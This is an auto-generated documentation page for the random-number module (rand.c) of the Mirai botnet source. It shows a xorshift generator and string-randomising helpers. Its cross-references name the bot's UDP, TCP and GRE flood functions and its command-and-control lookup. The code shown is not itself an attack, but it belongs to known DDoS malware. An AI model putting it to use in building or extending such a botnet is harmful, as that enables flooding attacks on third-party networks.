Mirai: mirai/bot/rand.c File Reference
rand.c File Reference
#include <stdint.h>
#include <unistd.h>
#include <stdlib.h>
#include <time.h>
#include "includes.h"
#include "rand.h"
Macros
#define _GNU_SOURCE
Functions
void rand_init (void)
uint32_t rand_next (void)
void rand_str (char *str, int len)
void rand_alphastr (uint8_t *str, int len)
Variables
static uint32_t x
static uint32_t y
static uint32_t z
static uint32_t w
Macro Definition Documentation
#define _GNU_SOURCE
Definition at line 1 of file rand.c.
Function Documentation
void rand_alphastr (uint8_t * str, int len)
Definition at line 56 of file rand.c.
References rand_next().
Referenced by attack_app_cfnull(), attack_udp_dns(), and main().
 {
     const char alphaset[] = "abcdefghijklmnopqrstuvw012345678";
     while (len > 0)
     {
         if (len >= sizeof (uint32_t))
         {
             int i;
             uint32_t entropy = rand_next();
             for (i = 0; i < sizeof (uint32_t); i++)
             {
                 uint8_t tmp = entropy & 0xff;
                 entropy = entropy >> 8;
                 tmp = tmp >> 3;
                 *str++ = alphaset[tmp];
             }
             len -= sizeof (uint32_t);
         }
         else
         {
             *str++ = rand_next() % (sizeof (alphaset));
             len--;
         }
     }
 }
void rand_init (void)
Definition at line 13 of file rand.c.
References w, x, y, and z.
Referenced by main().
 {
     x = time(NULL);
     y = getpid() ^ getppid();
     z = clock();
     w = z ^ y;
 }
uint32_t rand_next (void)
Definition at line 21 of file rand.c.
References w, x, y, and z.
Referenced by attack_app_cfnull(), attack_app_http(), attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_tcp_syn(), attack_udp_dns(), attack_udp_generic(), attack_udp_plain(), attack_udp_vse(), get_dns_resolver(), main(), rand_alphastr(), rand_str(), resolv_lookup(), and resolve_cnc_addr().
 {
     uint32_t t = x;
     t ^= t << 11;
     t ^= t >> 8;
     x = y; y = z; z = w;
     w ^= w >> 19;
     w ^= t;
     return w;
 }
void rand_str (char * str, int len)
Definition at line 32 of file rand.c.
References rand_next().
Referenced by attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_udp_generic(), and attack_udp_plain().
 {
     while (len > 0)
     {
         if (len >= 4)
         {
             *((uint32_t *)str) = rand_next();
             str += sizeof (uint32_t);
             len -= sizeof (uint32_t);
         }
         else if (len >= 2)
         {
             *((uint16_t *)str) = rand_next() & 0xFFFF;
             str += sizeof (uint16_t);
             len -= sizeof (uint16_t);
         }
         else
         {
             *str++ = rand_next() & 0xFF;
             len--;
         }
     }
 }
Variable Documentation
uint32_t w static
Definition at line 11 of file rand.c.
Referenced by rand_init(), and rand_next().
uint32_t x static
Definition at line 11 of file rand.c.
Referenced by rand_init(), and rand_next().
uint32_t y static
Definition at line 11 of file rand.c.
Referenced by rand_init(), and rand_next().
uint32_t z static
Definition at line 11 of file rand.c.
Referenced by rand_init(), and rand_next().